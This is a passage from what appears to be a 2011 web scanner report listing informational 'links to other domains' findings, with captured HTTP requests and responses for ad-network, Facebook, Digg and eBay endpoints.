Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=CAESEBL6QfFdOZBFuwKtr4mXcyc&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 14:28:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 278
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=CAESEBL6QfFdOZBFuwKtr4mXcyc&amp;cver=1">here</A>
...[SNIP]...

20.26. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?google_nid=admeld&google_cm&google_sc&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Found
Location: http://tag.admeld.com/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&external_user_id=CAESEEm-rSLvlOjzT4MOGrRtRVA&google_cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:44:23 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 402
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://tag.admeld.com/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&amp;admeld_adprovider_id=832&amp;admeld_call_type=redirect&amp;external_user_id=CAESEEm-rSLvlOjzT4MOGrRtRVA&amp;google_cver=1">here</A>
...[SNIP]...

20.27. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=appnexus1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz03MyZweGlkPTY5MzE%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://adx.adnxs.com/mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:26:07 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://adx.adnxs.com/mapuid?member=181&amp;user=CAESECFrKvBlT-cBj-xM8B2ECfY&amp;cver=1">here</A>
...[SNIP]...

20.28. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=themig&can=ffffffffffffffff HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://matcher.bidder7.mookie1.com/google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=1&can=ffffffffffffffff
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 18:37:28 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 305
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://matcher.bidder7.mookie1.com/google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&amp;cver=1&amp;can=ffffffffffffffff">here</A>
...[SNIP]...

20.29. http://developers.facebook.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?ref=pf HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.131.111
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:48 GMT
Content-Length: 13941

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_j
...[SNIP]...
<meta property="og:image" content="http://static.ak.fbcdn.net/rsrc.php/v1/yA/r/rwsSMfAU1li.png" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/PSpx_i42gvE.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
<a class="logo" href="/"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/N2f0JA5UPFU.png" alt="Facebook Developers" width="166" height="17" /></a>
...[SNIP]...

20.30. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:30:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=29908 10.2.128.186
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9012

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<meta name="description" content="The best news, videos and pictures on the web as voted on by the Digg community. Breaking news on Technology, Politics, Entertainment, and more!">

<link rel="shortcut icon" href="http://cdn1.diggstatic.com/img/favicon.a015f25c.ico">

<link rel="stylesheet" type="text/css" href="http://cdn2.diggstatic.com/css/two_column/library/global.184cd4bb.css" media="all">
<!--[if IE 7]>
...[SNIP]...
<![endif]-->

<link rel="stylesheet" type="text/css" href="http://cdn4.diggstatic.com/css/two_column/App_Submission/index.53cd0655.css" media="all">

<script type='text/javascript'>
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.surveymonkey.com/s/ZNBQMYJ" id="feedback-bar-survey">Take the survey</a>
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/two_column/lib.61fe8366.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6299437&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

20.31. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-0742401739139530&output=html&h=250&slotname=4384935633&w=250&lmt=1311136947&flash=10.3.181&url=http%3A%2F%2Fmajornelson.com%2F&dt=1311118945863&bpp=6&shv=r20110713&jsv=r20110627&correlator=1311118947498&frm=4&adk=2623290263&ga_vid=777545616.1311118951&ga_sid=1311118951&ga_hid=1083990928&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=1049&bih=723&fu=0&ifi=1&dtd=M&xpc=NDGHfy2VsO&p=http%3A//majornelson.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 19 Jul 2011 23:43:27 GMT
Server: cafe
Cache-Control: private
Content-Length: 3740
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://majornelson.com/%26hl%3Den%26client%3Dca-pub-0742401739139530%26adU%3Daxosoft.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGW31YiDsZ6SSUeUeo_Ooj_hYjYFg" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js"></script>
...[SNIP]...

20.32. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ptj?member=311&inv_code=cm.quadbostonglobe&size=160x600&imp_id=cm-10210473643_1311108278,11fda490648f83c&referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonglobe%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-10210473643_1311108278%2C11fda490648f83c%2Cnone%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dnowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D551186%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1311108273%3F HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII1LEDEAoYAiACKAIwwNmX8QQQwNmX8QQYAQ..; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb575527=5_[r^XI()v4bi][?zqy!w=Td+?enc=HMdxnOM4DkAAAABAMzMLQAAAAEAzMwtAc2iR7Xy_EUC4HoXrUbgTQN1zHazSs38qOHCoZussF2TA7CVOAAAAAPcqCAA3AQAANQEAAAIAAACeyAcADSwBAAEAAABVU0QAVVNEAKAAWAKqKwAAnwQBAgUCAQUAAAAADB5xdgAAAAA.&tt_code=cm.quadbostonglobe&udj=uf%28%27a%27%2C+21322%2C+1311108288%29%3Buf%28%27r%27%2C+510110%2C+1311108288%29%3Bppv%2815053%2C+%273062363989047342045%27%2C+1311108288%2C+1316292288%2C+98060%2C+76813%29%3B&cnd=!gyE-tQiM_gUQnpEfGAAgjdgEMAA4qldAAEi1AlD31SBYAGDIAWgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBzczM9FG4E0DBAc3MzPRRuBNAyQEzMzMzMzP3P9kBAAAAAAAA8D_gAQA.&ccd=!lwRFJgiM_gUQnpEfGI3YBCAA; path=/; expires=Wed, 20-Jul-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rfQCe7?0P(*AuB-u**g1:XIBOG#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`O#eS@?iab*eFC<w6z$DO^Tcc.#XB=6U.'M7Q+4AdiD@gc[5FE]T[7U:0sov)-Jo>9R2c%^J4A/.0(bl'kqZ6?5yZZ; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 19 Jul 2011 20:44:48 GMT
Content-Length: 386

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonglobe/;net=cm;u=,cm-10210473643_1311108278,11fda490648f83c,none,ax.340-bz.25;;cmw=nowl;sz=160x600;net=c
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1" width="1" height="1"/>');

20.33. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /seg?add=153795&t=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz03MyZweGlkPTY5MzE%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ONY2QKBYMVD5FEFX2BR37K%3A20110628%3A2%7CXEXAP5HEBFET3JK734P3BR%3A20110628%3A1%7COBXRF4HH6JFXLDDVFSEQTM%3A20110628%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A4%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A3%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1%7CM5OOXYHITZA7XGIMSMOSWH%3A20110628%3A1; icu=ChII1LEDEAoYASABKAEwoIvs8AQQoIvs8AQYAA..; anj=Kfw)lH.MX(*cOV4J(G0rT[sdS9#q[**!]Sj?.D5$b3XGr*4jV0]+t:u?!*j<L9b](e)H1(`+-Fq2=@FTdw<ei:aB%b14$h^)j4vglv!'6LSf?oc`u:Tsn_-oP>Z0IVm#i>Gtk>+b^ORfa1v?L</.9Z_C*.`u'i5B-XO5:/-%5D[zb>+K>cdJ)Jz`w6^)-lIbzJ2lQh@jHMAwvj)mNXp38tjP^7M@WY.PsU[7/NEMjU!1KYet_A>#LXEo*7ron=Wltj1hsNF4@+UZO!!5tJ#woQyuO)T8F.q^W46X!PN^Fj9@?7Z?TQ3RTNfA-3oM3EgVfIju<#.G/)w__2ES.hQq$Z`%Zmi?@Ht??.t?ZaDen%`by>vq$E<^GA$R?)^vJocR$$cOW%N'%(9o`v5<(U[y'rA+AaXg=z`X<MzA(EJfkq2]t@Hr=x9I[0[%OMhfr_NOkt6OuYJBl0.zmW:h^0d8ShDG.y_$:9-bLGi+hv!m4ex5?r`3)V[q.dMebAu%+>)2a#D`+#k?g]^i^v/Q8GvtUO?6-`b`2.EgfM#)qt]VjH#@'s-J6xpiIWnNHhuTC)3@<_l@Y(H_#:zhzR!SGPU_u%mT:UPQ'9/KpGHtlW:7')vE.Uw)(KJEK6L>yg.0iSp11dac+*(=xrlta+)R6R5p>8TLPbf)JGX@1b+Pq5.2qRTykNz<I-8tET[>msgo.<`$WTn>7I4wUu)^12LI<mKA?%[`(V:@gqc>mj+D/GBf1MvBbKTL1oW>TQW5S)H'QhxhWkZ_w1H+dtE7$Mb!n]tNK'; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:26:07 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 20:26:07 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lByDua)J710aP?'v<j9Bj9#sshCdn9A?J]MHm4djdh*fTokzlP?'IeiRYcrgd/?I%!PYNsa3QG7`':T=b1(C$n8uakA]EJgbo16l0bq[2PwUYeq4_zzD^L4=E-]ex/@l=PcBnc`Xuiu/:KpeW9)=iRv`fmKbVVZI/OoD3?DnN9OnmFhoOc8xvo>u6iwyeV>QD62__f7a#3:5q$q4aPqG1T:<Z?j/ZpS'aMhb'5BC:6G`$^@-]iEOVu=$]oKA#Iyuc=14In[iEbQSTC4@m-L6uZt<T=X')25C91X81x_:c<MSsRP34ukE(=bj*jPL(/0-IV84wB#+X^ss#[9<<$Q@a+VEl':1J7s*d7flUhAS_gG6KD^$>jiO9*?EC%C2qSJG%K77yOdi^ENEfY0GJK:fM2YkZ1BjtL8!51HU^V>TE$RP2z^M*Bu![@!Y:g=m(fw%ZMPpRx]qmOWK!'Lk9>pJs6jCl7vjhK'k7@Yq's#O2+k0bavX8IgZ(2eg8Iq'OgjaBA]27z5G>5#wkPFI*6>>O^xAod^m#Q<+^F@a6I/][hLzw7KZVd#XOb3(!4q%(>Nb8>WjvV)Ag6mq9`QIG?4<kyXV8`iy3b901p8f%<3GuwHa3VLpq'3E_EIX@P:F*z0G[Hj9G`rSz9zBgDE`-zKcoDn_h10b5.G5`lEsMJF[h=Ci0/_5cX7WrBo$-rxj<qpdy5L*C*#sgP9bhaN1pU%vF^VtPFLKx?]OOgMS)eiXRYplz0Y_>:6v0/3z[6Q.#CW>ETTl!6R%P8'YnBe`CJuHucMRU>CHwzceH:]d)'x)zLV?zhrz; path=/; expires=Mon, 17-Oct-2011 20:26:07 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 19 Jul 2011 20:26:07 GMT
Content-Length: 99

document.write('<img src="http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1" width="1" height="1"/>');

20.34. http://mobile.ebay.com/wp-content/themes/platformpro/js/ticker_twitter.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mobile.ebay.com
Path:   /wp-content/themes/platformpro/js/ticker_twitter.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /wp-content/themes/platformpro/js/ticker_twitter.js?ver=3.1 HTTP/1.1
Host: mobile.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ds2=asotr/b13qzzzzzLCz^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5E; dp1=bpbf/%2320000000000000000450070271^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c4e25dd01^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:18 GMT
Server: Apache
Last-Modified: Fri, 19 Nov 2010 20:39:37 GMT
ETag: "3b861b-16bd-4956de7a27440"
Accept-Ranges: bytes
Content-Length: 5821
Cneonction: close
Content-Type: application/x-javascript

// JavaScript Document
/*Example message arrays for the two demo scrollers*/
var pausecontenttwit=new Array()
//pausecontenttwit[0]='<div>RedLaser iPhone app voted "perfect shopping companion" in <
...[SNIP]...
</a> Top 10 Must Have Apps. <a href="http://nyti.ms/cUXeuF #redlaser #mobile" target="_blank">http://nyti.ms/cUXeuF #redlaser #mobile</a>
...[SNIP]...
</a> Top 10 Must Have Apps. <a href="http://nyti.ms/cUXeuF #redlaser #mobile" target="_blank">http://nyti.ms/cUXeuF #redlaser #mobile</a>
...[SNIP]...
</a> Top 10 Must Have Apps. <a href="http://nyti.ms/cUXeuF #redlaser #mobile" target="_blank">http://nyti.ms/cUXeuF #redlaser #mobile</a>
...[SNIP]...

20.35. http://pixel.invitemedia.com/admeld_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
